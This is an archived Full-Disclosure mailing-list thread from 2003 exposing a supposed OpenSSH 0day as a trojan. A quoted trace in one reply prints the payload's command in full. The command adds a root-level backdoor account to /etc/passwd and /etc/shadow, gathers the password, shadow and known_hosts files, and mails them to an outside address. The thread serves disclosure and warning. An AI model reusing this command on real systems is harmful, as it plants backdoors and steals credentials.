[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] new openssh exploit in the wild! * is FAKE AS SH@!*

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: Re: [Full-Disclosure] new openssh exploit in the wild! * is FAKE AS SH@!*
From: christopher neitzert <chris@xxxxxxxxxxxx>
Date: Thu, 18 Sep 2003 18:52:29 -0400

I'll confirm that it does this

The script actually opens a socket and connects to the target sshd but
does nothing with that connection.

It also takes a pretty deep look into /proc/net looking for other
networks attached to the device it is run from....

chris





On Fri, 2003-09-19 at 20:02, KF wrote:
> printf("[*] sending shellcode\n")= 22
> popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
> "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
> 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
> /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
>   find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp |
> /usr/sbin/sendmail -f ownage@xxxxxx
> m0nkeyhack@xxxxxxxxxxxxx) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
> 0x0804a6b0
> 
> 
> -KF
> 
> 
> gordon last wrote:
> > hi readers,
> > while i was staying idle in an so called 0day release channel on one irc 
> > network some scriptkiddies were
> > talking about an new 0day release.
> > 
> > in my backlog i can see the following:
> > ---cut
> > 08:09 [R4lph] *** r3t0r (r4lph@xxx) has joined channel #0dayz
> > 08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/
> > ---cut
> > 
> > i looked at this piece of exploit... it is binary so i'am not sure if 
> > this is a trojan or a backdoor or a virus. but i can't see anything 
> > strange while sniffing the exploit traffic. and i got root on serveral 
> > of my openbsd boxes with that. the bruteforcer seems to be very good.
> > 
> > i too looked at "strings theosshucksass" and found nothing suspicious.
> > 
> > this exploit seems to be in the wild (underground) since beginning of 
> > august.
> > 
> > thats quite a long time i hope most admins are patching the systems 
> > now... because the exploit is getting round faster and faster.
> > 
> > if anyone can reverse engineer this piece it would be great if he posts 
> > his resulsts on his list because iam really intressted on the exploiting 
> > technique used for that bug.
> > 
> > i cant get an idea on how to exploit this.
> > 
> > hmm...
> > regards,
> > glast
> > 
> > ------------------------------------------------------------------------
> > Ab sofort auch im Ortsbereich einfach die 0-10-13 vorwählen. Infos unter 
> > www.tele2.de » <http://www.tele2.de>
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-- 
Christopher Neitzert http://www.neitzert.com/~chris

Attachment: signature.asc
Description: This is a digitally signed message part

References:
- [Full-Disclosure] new openssh exploit in the wild!
  - From: gordon last
- Re: [Full-Disclosure] new openssh exploit in the wild! * is FAKE AS SH@!*
  - From: KF

Prev by Date: Re: [Full-Disclosure] FW: New Net Security Upgrade (ALERT:Original Post Contains Live Swen Sample)
Next by Date: [Full-Disclosure] Microsoft Biztalk Server documentation and repository sites weak permissions
Previous by thread: Re: [Full-Disclosure] new openssh exploit in the wild! * is FAKE AS SH@!*
Next by thread: Re: [Full-Disclosure] new openssh exploit in the wild! * is FAKE AS SH@!*
Index(es):
- Date
- Thread